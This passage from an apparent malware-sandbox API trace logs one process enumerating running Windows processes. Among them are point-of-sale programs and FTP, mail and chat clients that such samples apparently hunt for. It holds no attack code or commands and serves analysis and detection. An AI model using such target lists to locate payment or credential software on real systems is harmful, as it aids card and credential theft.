lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.649] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.651] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.653] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.655] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.657] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.659] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0238.660] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x524, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0238.662] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x630, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0238.664] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x64c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.666] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.668] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0238.670] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0238.676] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0238.678] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0238.680] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.682] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.684] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0238.686] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.688] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.691] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0238.693] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0238.695] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0238.696] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0238.698] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0238.702] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-red.exe")) returned 1 [0238.704] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="what_drive_decide.exe")) returned 1 [0238.705] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="truth-statement.exe")) returned 1 [0238.707] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="let_dark.exe")) returned 1 [0238.709] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="safe somebody.exe")) returned 1 [0238.711] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="singthatheart.exe")) returned 1 [0238.715] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="low.exe")) returned 1 [0238.717] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="apply-would.exe")) returned 1 [0238.719] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="of-official.exe")) returned 1 [0238.721] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x484, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="billion.exe")) returned 1 [0238.723] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="newsignsister.exe")) returned 1 [0238.725] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="present-agree.exe")) returned 1 [0238.731] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="article.exe")) returned 1 [0238.733] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="populationread.exe")) returned 1 [0238.735] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="play-religious.exe")) returned 1 [0238.737] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="look.exe")) returned 1 [0238.739] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="love.exe")) returned 1 [0238.741] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel final.exe")) returned 1 [0238.743] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0238.745] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0238.747] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0238.750] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0238.752] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0238.758] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0238.773] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0238.776] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0238.778] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0238.781] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0238.783] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0238.786] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x106c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0238.788] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0238.790] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0238.792] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0238.795] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0238.797] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0238.800] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0238.802] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0238.806] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0238.817] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0238.819] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0238.822] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0238.824] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0238.826] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0238.829] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0238.831] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0238.833] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0238.835] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0238.838] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0238.840] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0238.842] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0238.844] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0238.846] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0238.848] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0238.859] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0238.865] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0238.867] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0238.869] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0238.871] Process32Next (in: hSnapshot=0x24f0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, 